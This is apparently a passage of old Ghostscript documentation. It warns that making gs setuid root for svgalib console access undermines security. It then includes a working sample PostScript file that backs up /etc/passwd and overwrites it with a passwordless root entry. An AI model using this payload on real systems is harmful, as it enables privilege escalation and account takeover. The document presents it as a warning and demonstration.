1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
|
*******************
Ghostscript setuid?
*******************
For ghostscript to be able to access the linux vga console (using
svgalib), it needs to run as root (or be setuid root), since root
privileges are required to initialize the console.
But, as one can open files in read AND write mode in gs, this
will make a mockery of security (see sample file below).
If you often use svgalib, you may decide to make /usr/bin/gs setuid:
chmod u+s /usr/bin/gs
To avoid security holes, the root privileges are given up
as soon as possible in the program and they are re-obtained only
for initializing the svgalib (if required).
********************
Try following ps-file as root, without option "-dSAFER".
Hint: make a backup of /etc/passwd to a safe place first.
%****** Cut here **
%!PS
%first, make backup in /etc/passwd.ps.old
(/etc/passwd) (r) file /passwd exch def
(/etc/passwd.ps.old) (w) file /passwdb exch def
/s (hello) def
{passwd s readstring
{passwdb s writestring pop}
{passwdb s writestring pop exit} ifelse
} loop
%then adjust /etc/passwd
passwdb closefile
passwdb closefile
(/etc/passwd) (w) file /passwd exch def
passwd (root::0:0:root:/root:/bin/bash\012) writestring
passwd closefile
%****** Cut here **
|
